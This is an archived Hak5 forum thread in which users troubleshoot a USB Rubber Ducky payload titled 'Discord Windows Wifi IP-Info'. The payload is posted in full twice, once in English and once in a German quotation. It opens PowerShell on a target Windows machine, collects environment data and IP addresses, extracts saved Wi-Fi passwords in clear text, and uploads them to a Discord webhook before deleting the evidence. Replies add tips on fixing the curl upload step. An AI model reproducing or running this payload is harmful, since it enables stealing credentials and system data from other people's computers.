Emilio5639 Posted August 19, 2022 Share Posted August 19, 2022 I was trying to run the Discord Windows Wifi on my new MK II Rubber Ducky, and when I generated the inject.bin I get the the powershell to show up, but the Payload never sends the command to powershell. The window stays open and i can see another command line as if the enter key was sent, but not the string. I Went through and tried it manually, and it sends the webhook to discord when I cut and paste in PS, but now with the ducky. Might be an issue with the Payload Studio. REM Title: Discord Windows Wifi IP-Info REM Description: Grabs wifi passwords, environment data, IPv4 Network addresses, writes to a file, uploads it to Discord, then cleans up the file on the targets filesystem and exits. REM Author: Startrk1995 REM Props: Hak5 Team REM Version: 1.0 REM Category: Exfiltration REM Target: Windows 10 (CMD + Powershell) REM Attackmodes: HID REM Mandatory Info: Add your Discord Webhook URL in quotes with no spaces and with permission to post. REM Discord URL: Example: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd REM Legal: This script is for educational purposes only please do not use this for malicious purposes DELAY 500 GUI r DELAY 200 STRING powershell ENTER DELAY 1000 REM I have this as all one command for quickness. STRING $url="https://discord.com/api/webhooks/REMOVEDFROMPOST";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';exit ENTER Thanks again, Emilio Link to comment Share on other sites More sharing options...
dark_pyrro Posted August 21, 2022 Share Posted August 21, 2022 I guess you got some guidance about this on Discord Link to comment Share on other sites More sharing options...
Korben Posted August 26, 2022 Share Posted August 26, 2022 PayloadStudio 1.1.0 is out and likely addresses the issues you encountered. Link to comment Share on other sites More sharing options...
Mork Posted September 7, 2022 Share Posted September 7, 2022 On 8/20/2022 at 1:48 AM, Emilio5639 said: Ich habe versucht, das Discord Windows Wifi auf meinem neuen MK II Rubber Ducky auszuführen, und als ich die inject.bin generiert habe, wird die Powershell angezeigt, aber die Payload sendet den Befehl nie an die Powershell. Das Fenster bleibt geöffnet und ich kann eine andere Befehlszeile sehen, als ob die Eingabetaste gesendet wurde, aber nicht die Zeichenfolge. Ich bin durchgegangen und habe es manuell versucht, und es sendet den Webhook zu Zwietracht, wenn ich PS ausschneide und einfüge, aber jetzt mit dem Ducky. Könnte ein Problem mit Payload Studio sein. REM-Titel: Discord Windows Wifi IP-Info REM-Beschreibung: Erfasst WLAN-Passwörter, Umgebungsdaten, IPv4-Netzwerkadressen, schreibt in eine Datei, lädt sie auf Discord hoch, bereinigt dann die Datei im Zieldateisystem und beendet sich. REM-Autor: Startrk1995 REM Requisiten: Hak5 Team REM-Version: 1.0 REM-Kategorie: Exfiltration REM-Ziel: Windows 10 (CMD + Powershell) REM-Angriffsmodi: HID REM Obligatorische Informationen: Fügen Sie Ihre Discord-Webhook-URL in Anführungszeichen ohne Leerzeichen und mit der Erlaubnis zum Posten hinzu. REM-Discord-URL: Beispiel: https://discord.com/api/webhooks/123456789012345678/adjlfjlejlidsjasdlijflie_ajsdflkjaljeiljkdajlkjd REM Legal: Dieses Skript dient nur zu Bildungszwecken, bitte verwenden Sie es nicht für böswillige Zwecke VERZÖGERUNG 500 GUI r VERZÖGERUNG 200 STRING-Powershell EINTRETEN VERZÖGERUNG 1000 REM Ich habe dies als einen einzigen Befehl für Schnelligkeit. STRING $url="https://discord.com/api/webhooks/REMOVEFROMPOST";dir env: >> stats.txt; Get-NetIPAddress -AddressFamily IPv4 | Select-Object IPAddress,SuffixOrigin | where IPAddress -notmatch '(127.0.0.1|169.254.\d+.\d+)' >> stats.txt;(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Schlüsselinhalt\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{PROFILE_NAME=$name;PASSWORD=$pass}} | Format-Table -AutoSize >> stats.txt;$Body=@{ content = "$env:computername Stats from Ducky/Pico"};Invoke-RestMethod -ContentType 'Application/Json' -Uri $url -Method Post -Body ($Body | ConvertTo-Json);curl.exe -F "file1=@stats.txt" $url ; Remove-Item '.\stats.txt';beenden EINTRETEN Danke noch einmal, Emilio Hi, I'm currently trying to transfer data to Discord and found that the command curl.exe -F "file1=@stats.txt" $url; not working. The "-F" parameter doesn't seem to exist. How exactly did you solve the problem? Also would like to transfer a text file to Discord. But I haven't been able to fix the problem yet. I've also tried to code with Base64 and pass it as a single-line variable (string). Unfortunately, it is usually over 2000 characters. Do you have a solution for me? Thanks in advance! Link to comment Share on other sites More sharing options...
dark_pyrro Posted September 7, 2022 Share Posted September 7, 2022 Not sure if you got the answer on Discord, but if the "true" curl binary hasn't been installed on the Windows system, it's simply an alias for Invoke-WebRequest so you can probably not expect it to work as the real curl command in every aspect. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.